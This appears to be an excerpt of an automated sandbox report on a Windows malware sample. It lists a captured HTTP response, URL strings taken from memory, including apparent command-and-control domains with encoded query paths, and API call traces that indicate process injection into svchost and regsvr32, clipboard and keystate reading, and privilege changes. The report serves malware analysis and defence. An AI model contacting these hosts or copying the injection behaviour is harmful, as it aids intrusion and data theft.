Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 15:16:12 GMTServer: Apache/2.4.62 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: kSsZkfadpV.exe, 00000006.00000002.4499448420.00000000056B7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.treatyourownhip.online
Source: kSsZkfadpV.exe, 00000006.00000002.4499448420.00000000056B7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.treatyourownhip.online/k7fo/
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://admin.websupport.sk/
Source: regsvr32.exe, 00000005.00000002.4498387058.0000000005E82000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000040E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://aswbf102.qkjcx.cn/38.html
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.eu/
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.eot
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.eot?#iefix
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.svg#WebsupportSans-ExtraBold
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.ttf
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.woff
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.woff2
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eot
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eot?#iefix
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-Normal.ttf
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-Normal.woff
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.websupport.sk/fonts/WebsupportSans-Normal.woff2
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033Y
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: regsvr32.exe, 00000005.00000003.2524498821.00000000079E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: regsvr32.exe, 00000005.00000002.4498387058.0000000005516000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000003776000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.femaled.info/6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqd
Source: regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: regsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
Source: kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.websupport.sk/
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.websupport.sk/cart/domain-checker
Source: regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.websupport.sk/podpora
Source: kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.websupport.sk/support/kb-categories/ftp/
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003AC4C3 NtClose,2_2_003AC4C3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A4650 NtSuspendThread,LdrInitializeThunk,5_2_049A4650
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A4340 NtSetContextThread,LdrInitializeThunk,5_2_049A4340
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_049A2CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_049A2C70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2C60 NtCreateKey,LdrInitializeThunk,5_2_049A2C60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2DD0 NtDelayExecution,LdrInitializeThunk,5_2_049A2DD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_049A2DF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_049A2D10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_049A2D30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_049A2E80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_049A2EE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2FB0 NtResumeThread,LdrInitializeThunk,5_2_049A2FB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2FE0 NtCreateFile,LdrInitializeThunk,5_2_049A2FE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2F30 NtCreateSection,LdrInitializeThunk,5_2_049A2F30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2AD0 NtReadFile,LdrInitializeThunk,5_2_049A2AD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2AF0 NtWriteFile,LdrInitializeThunk,5_2_049A2AF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_049A2BA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_049A2BF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_049A2BE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2B60 NtClose,LdrInitializeThunk,5_2_049A2B60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A35C0 NtCreateMutant,LdrInitializeThunk,5_2_049A35C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A39B0 NtGetContextThread,LdrInitializeThunk,5_2_049A39B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2CC0 NtQueryVirtualMemory,5_2_049A2CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2CF0 NtOpenProcess,5_2_049A2CF0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2C00 NtQueryInformationProcess,5_2_049A2C00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2DB0 NtEnumerateKey,5_2_049A2DB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2D00 NtSetInformationFile,5_2_049A2D00
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2EA0 NtAdjustPrivilegesToken,5_2_049A2EA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2E30 NtWriteVirtualMemory,5_2_049A2E30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2F90 NtProtectVirtualMemory,5_2_049A2F90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2FA0 NtQuerySection,5_2_049A2FA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2F60 NtCreateProcessEx,5_2_049A2F60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2AB0 NtWaitForSingleObject,5_2_049A2AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A2B80 NtQueryInformationFile,5_2_049A2B80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A3090 NtSetValueKey,5_2_049A3090
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A3010 NtOpenDirectoryObject,5_2_049A3010
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A3D10 NtOpenProcessToken,5_2_049A3D10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049A3D70 NtOpenThread,5_2_049A3D70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B08EE0 NtCreateFile,5_2_02B08EE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B09340 NtAllocateVirtualMemory,5_2_02B09340
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B09050 NtReadFile,5_2_02B09050
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B091E0 NtClose,5_2_02B091E0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02B09140 NtDeleteFile,5_2_02B09140
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004120380_2_00412038
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004271610_2_00427161
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0047E1FA0_2_0047E1FA
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004212BE0_2_004212BE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004433900_2_00443390
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004433910_2_00443391
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0041A46B0_2_0041A46B
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0041240C0_2_0041240C
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004465660_2_00446566
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004045E00_2_004045E0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0041D7500_2_0041D750
